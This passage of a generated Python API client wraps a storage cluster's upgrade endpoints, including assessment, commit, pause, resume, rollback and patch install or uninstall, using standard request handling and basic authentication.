def create_cluster_assess_item(self, cluster_assess_item, **kwargs): # noqa: E501
"""create_cluster_assess_item # noqa: E501
Start upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_assess_item(cluster_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAssessItem cluster_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_assess_item_with_http_info(cluster_assess_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_assess_item_with_http_info(cluster_assess_item, **kwargs) # noqa: E501
return data
def create_cluster_assess_item_with_http_info(self, cluster_assess_item, **kwargs): # noqa: E501
"""create_cluster_assess_item # noqa: E501
Start upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_assess_item_with_http_info(cluster_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAssessItem cluster_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_assess_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_assess_item' is set
if ('cluster_assess_item' not in params or
params['cluster_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_assess_item` when calling `create_cluster_assess_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_assess_item' in params:
body_params = params['cluster_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/5/upgrade/cluster/assess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_commit_item(self, cluster_commit_item, **kwargs): # noqa: E501
"""create_cluster_commit_item # noqa: E501
Commit the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_commit_item(cluster_commit_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_commit_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_commit_item_with_http_info(cluster_commit_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_commit_item_with_http_info(cluster_commit_item, **kwargs) # noqa: E501
return data
def create_cluster_commit_item_with_http_info(self, cluster_commit_item, **kwargs): # noqa: E501
"""create_cluster_commit_item # noqa: E501
Commit the upgrade of a cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_commit_item_with_http_info(cluster_commit_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_commit_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_commit_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_commit_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_commit_item' is set
if ('cluster_commit_item' not in params or
params['cluster_commit_item'] is None):
raise ValueError("Missing the required parameter `cluster_commit_item` when calling `create_cluster_commit_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_commit_item' in params:
body_params = params['cluster_commit_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/commit', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_firmware_assess_item(self, cluster_firmware_assess_item, **kwargs): # noqa: E501
"""create_cluster_firmware_assess_item # noqa: E501
Start firmware upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_assess_item(cluster_firmware_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_firmware_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, **kwargs) # noqa: E501
return data
def create_cluster_firmware_assess_item_with_http_info(self, cluster_firmware_assess_item, **kwargs): # noqa: E501
"""create_cluster_firmware_assess_item # noqa: E501
Start firmware upgrade assessment on cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_assess_item_with_http_info(cluster_firmware_assess_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_firmware_assess_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_assess_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_assess_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_assess_item' is set
if ('cluster_firmware_assess_item' not in params or
params['cluster_firmware_assess_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_assess_item` when calling `create_cluster_firmware_assess_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_assess_item' in params:
body_params = params['cluster_firmware_assess_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/assess', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_firmware_upgrade_item(self, cluster_firmware_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_firmware_upgrade_item # noqa: E501
The settings necessary to start a firmware upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_upgrade_item(cluster_firmware_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, **kwargs) # noqa: E501
return data
def create_cluster_firmware_upgrade_item_with_http_info(self, cluster_firmware_upgrade_item, **kwargs): # noqa: E501
"""create_cluster_firmware_upgrade_item # noqa: E501
The settings necessary to start a firmware upgrade. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_firmware_upgrade_item_with_http_info(cluster_firmware_upgrade_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_firmware_upgrade_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_firmware_upgrade_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_firmware_upgrade_item' is set
if ('cluster_firmware_upgrade_item' not in params or
params['cluster_firmware_upgrade_item'] is None):
raise ValueError("Missing the required parameter `cluster_firmware_upgrade_item` when calling `create_cluster_firmware_upgrade_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_firmware_upgrade_item' in params:
body_params = params['cluster_firmware_upgrade_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/firmware/upgrade', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_patch_abort_item(self, cluster_patch_abort_item, **kwargs): # noqa: E501
"""create_cluster_patch_abort_item # noqa: E501
Abort the previous action performed by the patch system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_abort_item(cluster_patch_abort_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_patch_abort_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, **kwargs) # noqa: E501
else:
(data) = self.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, **kwargs) # noqa: E501
return data
def create_cluster_patch_abort_item_with_http_info(self, cluster_patch_abort_item, **kwargs): # noqa: E501
"""create_cluster_patch_abort_item # noqa: E501
Abort the previous action performed by the patch system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_cluster_patch_abort_item_with_http_info(cluster_patch_abort_item, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Empty cluster_patch_abort_item: (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_patch_abort_item'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_cluster_patch_abort_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_patch_abort_item' is set
if ('cluster_patch_abort_item' not in params or
params['cluster_patch_abort_item'] is None):
raise ValueError("Missing the required parameter `cluster_patch_abort_item` when calling `create_cluster_patch_abort_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_patch_abort_item' in params:
body_params = params['cluster_patch_abort_item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/upgrade/cluster/patch/abort', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_cluster_patch_patch(self, cluster_patch_patch, **kwargs):  # noqa: E501
    """create_cluster_patch_patch  # noqa: E501

    Install a patch.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_patch_patch(cluster_patch_patch, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterPatchPatch cluster_patch_patch: (required)
    :param bool skip_version_check: Bypass version checks. Defaults to false.
    :param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
    :param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
    :param bool simultaneous: Install the patch on all nodes at once. Defaults to false.
    :param bool rolling: Install the patch on one node at a time. Defaults to true.
    :param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
    :return: CreateResponse
    """
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant already yields the payload (sync) or
    # the request thread (async_req=True), so a single delegation covers
    # both paths.
    return self.create_cluster_patch_patch_with_http_info(cluster_patch_patch, **kwargs)  # noqa: E501
def create_cluster_patch_patch_with_http_info(self, cluster_patch_patch, **kwargs):  # noqa: E501
    """create_cluster_patch_patch  # noqa: E501

    Install a patch.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_patch_patch_with_http_info(cluster_patch_patch, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterPatchPatch cluster_patch_patch: (required)
    :param bool skip_version_check: Bypass version checks. Defaults to false.
    :param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
    :param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
    :param bool simultaneous: Install the patch on all nodes at once. Defaults to false.
    :param bool rolling: Install the patch on one node at a time. Defaults to true.
    :param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
    :return: CreateResponse
    """
    all_params = [
        'cluster_patch_patch',
        'skip_version_check',
        'skip_conflict_check',
        'skip_restricted_check',
        'simultaneous',
        'rolling',
        'skip_dependency_check',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_patch_patch" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_patch_patch') is None:
        raise ValueError("Missing the required parameter `cluster_patch_patch` when calling `create_cluster_patch_patch`")  # noqa: E501

    # Optional toggles travel as query parameters, in declaration order.
    query_params = [
        (name, params[name])
        for name in ('skip_version_check', 'skip_conflict_check',
                     'skip_restricted_check', 'simultaneous',
                     'rolling', 'skip_dependency_check')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/patch/patches', 'POST',
        {},  # no path parameters
        query_params,
        header_params,
        body=params['cluster_patch_patch'],
        post_params=[],
        files={},
        response_type='CreateResponse',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_cluster_pause_item(self, cluster_pause_item, **kwargs):  # noqa: E501
    """create_cluster_pause_item  # noqa: E501

    Pause a running upgrade process.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_pause_item(cluster_pause_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_pause_item: (required)
    :return: Empty
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.create_cluster_pause_item_with_http_info(cluster_pause_item, **kwargs)  # noqa: E501
def create_cluster_pause_item_with_http_info(self, cluster_pause_item, **kwargs):  # noqa: E501
    """create_cluster_pause_item  # noqa: E501

    Pause a running upgrade process.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_pause_item_with_http_info(cluster_pause_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_pause_item: (required)
    :return: Empty
    """
    all_params = [
        'cluster_pause_item',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_pause_item" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_pause_item') is None:
        raise ValueError("Missing the required parameter `cluster_pause_item` when calling `create_cluster_pause_item`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/pause', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['cluster_pause_item'],
        post_params=[],
        files={},
        response_type='Empty',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_cluster_resume_item(self, cluster_resume_item, **kwargs):  # noqa: E501
    """create_cluster_resume_item  # noqa: E501

    Resume a paused upgrade process.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_resume_item(cluster_resume_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_resume_item: (required)
    :return: Empty
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.create_cluster_resume_item_with_http_info(cluster_resume_item, **kwargs)  # noqa: E501
def create_cluster_resume_item_with_http_info(self, cluster_resume_item, **kwargs):  # noqa: E501
    """create_cluster_resume_item  # noqa: E501

    Resume a paused upgrade process.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_resume_item_with_http_info(cluster_resume_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_resume_item: (required)
    :return: Empty
    """
    all_params = [
        'cluster_resume_item',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_resume_item" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_resume_item') is None:
        raise ValueError("Missing the required parameter `cluster_resume_item` when calling `create_cluster_resume_item`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/7/upgrade/cluster/resume', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['cluster_resume_item'],
        post_params=[],
        files={},
        response_type='Empty',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_cluster_retry_last_action_item(self, cluster_retry_last_action_item, **kwargs):  # noqa: E501
    """create_cluster_retry_last_action_item  # noqa: E501

    Retry the last upgrade action, in-case the previous attempt failed.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_retry_last_action_item(cluster_retry_last_action_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterRetryLastActionItem cluster_retry_last_action_item: (required)
    :return: Empty
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.create_cluster_retry_last_action_item_with_http_info(cluster_retry_last_action_item, **kwargs)  # noqa: E501
def create_cluster_retry_last_action_item_with_http_info(self, cluster_retry_last_action_item, **kwargs):  # noqa: E501
    """create_cluster_retry_last_action_item  # noqa: E501

    Retry the last upgrade action, in-case the previous attempt failed.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_retry_last_action_item_with_http_info(cluster_retry_last_action_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterRetryLastActionItem cluster_retry_last_action_item: (required)
    :return: Empty
    """
    all_params = [
        'cluster_retry_last_action_item',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_retry_last_action_item" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_retry_last_action_item') is None:
        raise ValueError("Missing the required parameter `cluster_retry_last_action_item` when calling `create_cluster_retry_last_action_item`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/retry_last_action', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['cluster_retry_last_action_item'],
        post_params=[],
        files={},
        response_type='Empty',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_cluster_rollback_item(self, cluster_rollback_item, **kwargs):  # noqa: E501
    """create_cluster_rollback_item  # noqa: E501

    Rollback the upgrade of a cluster.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_rollback_item(cluster_rollback_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_rollback_item: (required)
    :return: Empty
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.create_cluster_rollback_item_with_http_info(cluster_rollback_item, **kwargs)  # noqa: E501
def create_cluster_rollback_item_with_http_info(self, cluster_rollback_item, **kwargs):  # noqa: E501
    """create_cluster_rollback_item  # noqa: E501

    Rollback the upgrade of a cluster.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_rollback_item_with_http_info(cluster_rollback_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param Empty cluster_rollback_item: (required)
    :return: Empty
    """
    all_params = [
        'cluster_rollback_item',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_rollback_item" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_rollback_item') is None:
        raise ValueError("Missing the required parameter `cluster_rollback_item` when calling `create_cluster_rollback_item`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/3/upgrade/cluster/rollback', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['cluster_rollback_item'],
        post_params=[],
        files={},
        response_type='Empty',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def create_cluster_upgrade_item(self, cluster_upgrade_item, **kwargs):  # noqa: E501
    """create_cluster_upgrade_item  # noqa: E501

    The settings necessary to start an upgrade.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.create_cluster_upgrade_item(cluster_upgrade_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterUpgradeItem cluster_upgrade_item: (required)
    :return: Empty
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.create_cluster_upgrade_item_with_http_info(cluster_upgrade_item, **kwargs)  # noqa: E501
def create_cluster_upgrade_item_with_http_info(self, cluster_upgrade_item, **kwargs):  # noqa: E501
    """create_cluster_upgrade_item  # noqa: E501

    The settings necessary to start an upgrade.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.create_cluster_upgrade_item_with_http_info(cluster_upgrade_item, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterUpgradeItem cluster_upgrade_item: (required)
    :return: Empty
    """
    all_params = [
        'cluster_upgrade_item',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    params = locals()
    # Fold recognised keyword arguments into ``params``; anything else is
    # a caller-side programming error.
    for key in list(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_upgrade_item" % key
            )
        params[key] = params['kwargs'][key]
    del params['kwargs']

    if params.get('cluster_upgrade_item') is None:
        raise ValueError("Missing the required parameter `cluster_upgrade_item` when calling `create_cluster_upgrade_item`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/platform/9/upgrade/cluster/upgrade', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['cluster_upgrade_item'],
        post_params=[],
        files={},
        response_type='Empty',  # noqa: E501
        auth_settings=['basicAuth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def delete_cluster_patch_patch(self, cluster_patch_patch_id, **kwargs):  # noqa: E501
    """delete_cluster_patch_patch  # noqa: E501

    Uninstall a patch.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` to perform the
    request asynchronously, in which case the request thread is
    returned instead of the response data.

    >>> thread = api.delete_cluster_patch_patch(cluster_patch_patch_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str cluster_patch_patch_id: Uninstall a patch. (required)
    :param bool skip_version_check: Bypass version checks. Defaults to false.
    :param bool skip_conflict_check: Bypass conflict checks. Defaults to false.
    :param bool skip_restricted_check: Bypass restricted checks. Defaults to false.
    :param bool simultaneous: Uninstall the patch on all nodes at once. Defaults to false.
    :param bool rolling: Install the patch on one node at a time. Defaults to true.
    :param bool skip_dependency_check: Bypass dependency checks. Defaults to false.
    :return: None
    """
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both reduce to the *_with_http_info call.
    return self.delete_cluster_patch_patch_with_http_info(cluster_patch_patch_id, **kwargs)  # noqa: E501
def delete_cluster_patch_patch_with_http_info(self, cluster_patch_patch_id, **kwargs):  # noqa: E501
    """delete_cluster_patch_patch  # noqa: E501

    Uninstall a patch.  # noqa: E501
